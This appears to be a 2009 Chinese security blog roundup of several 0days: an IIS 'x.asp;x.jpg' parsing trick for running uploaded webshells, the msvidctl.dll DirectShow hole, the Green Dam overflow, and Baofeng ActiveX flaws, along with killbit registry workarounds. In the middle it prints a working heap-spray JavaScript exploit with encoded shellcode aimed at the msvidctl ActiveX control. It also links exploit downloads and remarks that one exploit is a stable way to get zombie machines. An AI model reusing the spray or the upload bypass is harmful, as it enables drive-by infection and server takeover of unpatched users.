风雪居

这个出来有几天了  偶又后知后觉才知道
当上传图片为x.asp;x.jpg时，IIS会自动解析为asp格式，可以说是IIS只认;符号前面的文件解析

所以我们只要上传后是x.asp;x.jpg这样的形式，就可以执行我们的马了，测试了下，x.php;x.jpg也是可以执行的。

该漏洞会在用户点击相应“挂马网页”时，恶意代码就会自动触发以上MPEG2视频组件的msvidctl.dll模块，相应地IE等浏览器会表现为卡死一小会儿，随后，电脑就会自动下载和运行一系列黑客预先设置好的木马程序，期间会出现恶意代码会强制关闭有大部分安全软件、劫持IE首页、弹出广告页面等各种现象。
目测 似乎很多广告托管商都被植入这些代码了 经常弹窗的网站 小心了~
[b][color=Red]目前微软没发布补丁 如果想一劳永逸 干脆在安全级别关闭ActiveX好了
以下代码保存为.reg文件 导入即可[/b]
[code]Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400[/code]
这新闻出来有几天了 没转载是因为 没找到shellcode
漏洞利用片段代码 来自：冷漠的博客(他说他也转载的)
(此代码灰常安全 因为只是个代码片段而已)
[code]var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
var dashell=unescape(nndx+"%u03eb%ueb59%ue805%ufff8%uffff%u4937%u4949%u4949%u4949%u4949" +
"%u4949%u4949%u4949%u4949%u5a51%u456a%u5058%u4230%u4130%u416b" +
"%u5541%u4132%u3242%u4242%u4142%u4230%u5841%u3850%u4241%u7875" +
"%u7969%u6d6c%u3038%u6544%u7550%u7350%u6e30%u516b%u7755%u4c4c" +
"%u414b%u656c%u3355%u4348%u3831%u4c6f%u304b%u464f%u4c78%u314b" +
"%u374f%u3450%u4a41%u624b%u4e69%u666b%u6e54%u666b%u6a61%u304e" +
"%u3931%u4f50%u4c69%u6f6c%u5974%u3450%u3534%u5957%u7951%u565a" +
"%u776d%u6f71%u7832%u6b6b%u6744%u714b%u6744%u7754%u3474%u4b35" +
"%u6e55%u436b%u466f%u6544%u3851%u506b%u4c66%u564b%u306c%u4c4b" +
"%u414b%u374f%u656c%u5a51%u6c4b%u654b%u4c4c%u674b%u6871%u6e6b" +
"%u7169%u654c%u6674%u5964%u4653%u4951%u6550%u6c34%u634b%u3470" +
"%u4b70%u4b35%u5470%u3438%u6e4c%u436b%u6670%u4e6c%u626b%u7550" +
"%u4c4c%u6e6d%u536b%u3758%u4a78%u554b%u4c59%u6d4b%u6e50%u6550" +
"%u6550%u4750%u6c70%u434b%u6558%u716c%u464f%u5a51%u4156%u3070" +
"%u4d56%u6c59%u4e38%u4963%u7150%u526b%u7570%u7138%u4b6e%u4b68" +
"%u3152%u6563%u4c38%u5958%u6e6e%u746a%u714e%u4b47%u7a4f%u7047" +
"%u6363%u5251%u634c%u5553%u4550");
var headersize=20;
var omybro=unescape(nndx);
var slackspace=headersize+dashell.length;
while(omybro.length omybro+=omybro;
bZmybr=omybro.substring(0,slackspace);
shuishiMVP=omybro.substring(0,omybro.length-slackspace);
while(shuishiMVP.length+slackspace<0x30000)
shuishiMVP=shuishiMVP+shuishiMVP+bZmybr;
memory=new Array();
for(x=0;x<300;x++)
memory[x]=shuishiMVP+dashell;
var myObject=document.createElement('object');
DivID.appendChild(myObject);
myObject.width='1';
myObject.height='1';
myObject.data='./logo.gif';
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';[/code]

Green Dam remote buffer overflow exploit
“Green Dam” is a software used for monitoring and anti-pornography, popularizing by
Chinese goverment. After July 1st, it will be forced to install on all new Chinese PCs.
Now it already has 50 million copies in China.
In order to monitor the URL that user is exploring, Green Dam injected the browser
process. When Green Dam is trying to handle a long URL, a stack overflow will occur in the
browser process.
This exploit can be used for exploitation on IE, on those computers installed Green Dam.
I used the .net binary to deploy shellcode, for it`s more stable than Heap Spray, and able
to bypass DEP and ASLR on Vista.
The exploit page contains a .net control, so it should be published on IIS.
—seer[N.N.U]

http://milw0rm.com/sploits/2009-green-dam.zip

# milw0rm.com [2009-06-12]
我试着翻译下。。
绿坝远程缓冲区溢出漏洞
“绿坝”是一个中国政府推广的用于监测和反色情的软件。
在7月1日，新电脑都得预装这份软件。
现在已经有5000万台电脑使用它。
为了监测用户输入的URL地址，绿坝注入了浏览器进程。
而当绿坝试图处理长URL， 浏览器进程将出堆栈溢出。
这个漏洞适用于安装了绿坝电脑的IE浏览器。
我用了.net binary配置的shellcode,因为它能使Heap Spray更加稳定
并能绕过的DEP硬件保护和Vista操作系统的ASLR技术上。
这里我们公布该漏洞利用程序下载

http://milw0rm.com/sploits/2009-green-dam.zip

—seer[N.N.U]
[color=Red]点评:稳定的肉鸡获取方式

DirectShow 0day是一个中率极高的0day漏洞，目前已经开始在网上爆发，其攻击形势不亚于去年的IE7 0day以及往年的ANI 0day。
攻击特性如下：
1.使用了.NET SHELLCODE技术，机器上装有.net framework就会中招。
2.利用XP自带的Windows Media Player播放漏洞媒体文件触发。
解决方案：
目前微软没有补丁，只提供了临时解决方案，为了防止0DAY攻击，请使用360提供的打包程序 解决漏洞。
http://dl.360safe.com/360safefixavi.exe
1号就发布了-。- 不过给疏忽了 影响重大 还是发出来吧

5月2日，暴风影音日常更新的版本：Build version : 3.9.4.27中发现0day漏洞。(详情请参见：http://blog.tkbbs.com/article/62.htm)安装了该版本暴风影音的用户在访问挂有恶意代码的网站的时候将可能被木马入侵。暴风影音3.9.4.27版本于4月30日上线，目前使用用户30-50万。暴风于5月4日上午发布该漏洞的官方补丁。提醒该版本用户及时通过暴风影音官方论坛下载补丁进行安装升级。
0day是在软件发布后，在最短时间内出现相关破解的，都可以叫0day。0day漏洞在软件行业普遍存在，绝大多数都是黑客高手对知名软件进行破解发现的，各大软件厂商都通过在第一时间发布漏洞补丁解决。2009年以来，比较重要的0day漏洞包括：IE7漏洞，Mozilla火狐漏洞，Adobe漏洞等，国内的世界之窗也在2009年发现0day漏洞。
暴风影音此次的0day漏洞由于发现及时，快速的发布了漏洞补丁，影响范围并不大。补丁包下载地址：
Download
点击下载补丁
本地补丁下载：
点击下载此文件
PS:这漏洞5月1日就公布在某安全论坛 2号才公开到媒体 4号 才把利用工具放出来 影响降低到最大程度了~~

5月2日,暴风公司接到举报,有黑客破解了暴风影音软件,即产生0day漏洞.在紧急进行技术分析后,暴风公司确认有部分版本被黑客攻击,形成0day漏洞.该漏洞影响的用户数约为180万,占暴风总用户数的1%左右.
暴风呼吁以上公布的4个版本的用户尽快升级或者安装暴风官方漏洞补丁.更重要的是不要拜访不知名的可能包含木马的恶意网站.
同时,对于暴风0day漏洞被黑客利用的事件,暴风已经向公安机关报案,对危害用户安全的行为,暴风将利用法律武器追究到底.

事实证明任何事情都可以拿来当正面材料来炒作自己 自己出了个漏洞 转身一推 责任就到所谓的“黑客”身上了。 有黑客破解了暴风影音软件,即产生0day漏洞 充分体现了一种无知

国内安全研究者在5月1号凌晨公布了暴风影音的两个ActiveX远程溢出漏洞(link1,link2)。当安装了暴风影音的用户在浏览黑客精心构造的 包含恶意代码的网页后，可能会导致系统遭受到黑客的攻击。现在在著名exploit网站milw0rm上已经出现了相应的漏洞利用程序。
目前暴风影音尚未发布任何安全公告和安全补丁。
临时解决方法：
在厂商没有推出相应的补丁之前，
建议用户通过注册表对相应的CLSID:BD103B2B-30FB-4F1E-8C17-D8F6AADBCC05设置Killbit
或者将以下文本保存为.REG文件并导入:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{BD103B2B-30FB-4F1E-8C17-D8F6AADBCC05}]
“Compatibility Flags”=dword:00000400[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB}]
“Compatibility Flags”=dword:00000400
测试代码：
[code]#
# BaoFeng (mps.dll) Remote Code Execution Exploit
# By: MITBOY
# Download: www.baofeng.com
#
# Problem DLL : mps.dll
# Problem Func : OnBeforeVideoDownload()

# milw0rm.com [2009-04-30][/code]